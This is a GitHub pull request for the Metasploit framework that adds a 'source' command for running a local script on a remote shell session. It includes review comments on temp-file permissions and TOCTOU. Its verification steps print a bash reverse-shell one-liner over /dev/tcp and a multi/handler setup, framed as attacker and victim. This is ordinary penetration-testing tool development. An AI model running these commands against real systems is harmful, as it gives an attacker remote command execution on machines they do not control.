Add source meta command for shell session #10509

Merged
merged 5 commits into from Nov 26, 2018

@WangYihang (Contributor) commented Aug 22, 2018

Description

Implementation of the `source` command.
This command allows the attacker to execute a local script on the remote machine.

Verification

Step 1: Attacker side

```shell
./msfconsole -qx 'use multi/handler; \
set payload cmd/unix/reverse_bash; \
set LHOST 127.0.0.1; \
set LPORT 4444; \
exploit'
```

Step 2: Victim side

```shell
bash -c 'bash -i >&/dev/tcp/127.0.0.1/4444 2>&1 0>&1'
```

Step 3: Attacker side

Create a shell script file

```shell
$ cat ../test/test.sh
#!/bin/bash

date
ip addr
sleep 100
```

Step 4: Attacker side

- Execute in background: type `source /tmp/evil.sh n` in the Metasploit command interface
- Verify the file /tmp/evil.rb in the attacker's machine will be executed on the remote machine in foreground
- Verify that after you have typed the command `source /tmp/evil.sh n` you can execute other commands immediately (e.g. `uname -a`) and do not have to wait for the end of the execution
```text
[*] Started reverse TCP handler on 127.0.0.1:4444

source
Usage: source [file] [background]

Execute a local shell script file on remote machine
This meta command will upload the script then execute it on the remote machine

background
`y` represent execute the script in background, `n` represent on foreground
source ../test/test.sh n
[*] File <../test/test.sh> size: 27, need 1 times writes to upload
[*] Uploading (256/27)
[+] File </tmp/.driLUHxNXQLmlyHjyKNdilgHqxjZaNXF.sh> upload finished
[*] Executing on remote machine foreground
+ date
2018年 08月 22日 星期三 21:46:55 CST
+ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: enp1s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 10:e7:c6:1f:44:84 brd ff:ff:ff:ff:ff:ff
    inet 10.25.232.80/24 brd 10.25.232.255 scope global dynamic noprefixroute enp1s0
       valid_lft 22278sec preferred_lft 22278sec
    inet6 fe80::e548:b03b:aa8:7518/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
[*] Cleaning temp file on remote machine
uname -a
Linux sun 4.15.0-32-generic #35-Ubuntu SMP Fri Aug 10 17:58:07 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
```

```ruby
if background
print_status("Executing on remote machine background")
print_line(shell_command("nohup sh -x #{remote_file} &"))
```

@wvu-r7 (Contributor) commented Aug 22, 2018

Nice use of xtrace to log executed commands!

@WangYihang (Contributor) commented Aug 23, 2018

Cool, I will try to test this command~ thank you for your suggestion~

@wvu-r7 (Contributor) commented Aug 23, 2018

You're already doing it with -x. :)

@WangYihang (Contributor) commented Aug 23, 2018

@wvu-r7 Did you mean this tool? https://github.com/johnno1962/Xtrace I found several tools named xtrace, >_<, (strace or ltrace?)

@wvu-r7 (Contributor) commented Aug 23, 2018

I mean the functionality of set -x, which is called xtrace:

```text
wvu@kharak:~$ help set | grep -- -x | sed \$d
              xtrace       same as -x
      -x  Print commands and their arguments as they are executed.
wvu@kharak:~$
```

```ruby
background = args[1].downcase == 'y'
local_file = args[0]
remote_file = "/tmp/." + ::Rex::Text.rand_text_alpha(32) + ".sh"
```

@wvu-r7 (Contributor) commented Aug 25, 2018

You might want to protect the permissions of this file.

@WangYihang (Contributor) commented Aug 30, 2018

Sorry, I didn't understand what you mean. The file created here is for temporary use and after use, it will be deleted. I don't understand why I need to protect the permissions of this file.

@sempervictus (Contributor) commented Aug 30, 2018

@WangYihang: TOCTOU concerns about whether you're executing what you intended, or what someone with access to your system (or the path where this file is created on a remotely mounted FS) while you're working is intending (at time of use, of course).

@wvu-r7 (Contributor) commented Aug 30, 2018

A good start is 0600 for a script executed directly by the shell.

@WangYihang (Contributor) commented Aug 30, 2018

Okay, I will update the code.
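The 0600 and TOCTOU points raised in the review above, as an added Ruby example that is not the PR's code: the temporary script is created with O_CREAT|O_EXCL and mode 0600 in a single open(), so a pre-planted name is refused rather than followed and there is no window with permissive bits, and it is re-checked with lstat immediately before use. It assumes a local directory from Dir.mktmpdir (the PR writes its file through the remote shell session), so it shows the file-handling pattern rather than the session plumbing; `write_script_securely`, `script_safe?` and `reuse_attempt_rejected?` are names chosen here.

```ruby
require 'securerandom'
require 'tmpdir'

# Creates the temporary script with O_CREAT|O_EXCL and mode 0600 in one call.
# EXCL makes open() fail with EEXIST if a file or symlink already occupies the
# name, so a pre-planted path is refused instead of followed; the 0600 mode is
# applied at creation, so there is no window in which the script is readable
# or writable by other users before it is executed.
def write_script_securely(dir, contents)
  path = File.join(dir, '.' + SecureRandom.hex(16) + '.sh')
  File.open(path, File::WRONLY | File::CREAT | File::EXCL, 0o600) do |f|
    f.write(contents)
  end
  path
end

# Permission bits of the script as the interpreter that runs it will see them.
def script_mode(path)
  File.stat(path).mode & 0o777
end

# Time-of-use check: only run a regular file owned by us with no group/other
# permission bits. lstat is used so that a symlink planted at the path fails.
def script_safe?(path)
  st = File.lstat(path)
  st.file? && st.uid == Process.euid && (st.mode & 0o077).zero?
rescue Errno::ENOENT
  false
end

# Returns true when a second EXCL create on the same name is refused, i.e.
# once we hold the name nobody else can claim it underneath us.
def reuse_attempt_rejected?(path)
  File.open(path, File::WRONLY | File::CREAT | File::EXCL, 0o600) {}
  false
rescue Errno::EEXIST
  true
end

if __FILE__ == $PROGRAM_NAME
  Dir.mktmpdir do |dir|
    # Constructed sample script; mirrors the xtrace style used in the PR.
    path = write_script_securely(dir, "#!/bin/sh\nset -x\ndate\n")
    puts format('%s mode=%o safe=%s', path, script_mode(path), script_safe?(path))
  end
end
```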

@busterb (Contributor) commented Oct 6, 2018

Jenkins test this please.

@busterb busterb self-assigned this Nov 26, 2018

@busterb (Contributor) commented Nov 26, 2018

Looks good, landing.

@busterb busterb merged commit a83e635 into rapid7:master Nov 26, 2018

3 checks passed

- Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
- Metasploit Automation - Test Execution: Successfully completed all tests.
- continuous-integration/travis-ci/pr: The Travis CI build passed

busterb added a commit that referenced this pull request Nov 26, 2018

@busterb (Contributor) commented Nov 26, 2018

Release Notes

This adds a source command for shell sessions that allows running a local shell script remotely in a single step.

msjenkins-r7 added a commit that referenced this pull request Nov 26, 2018
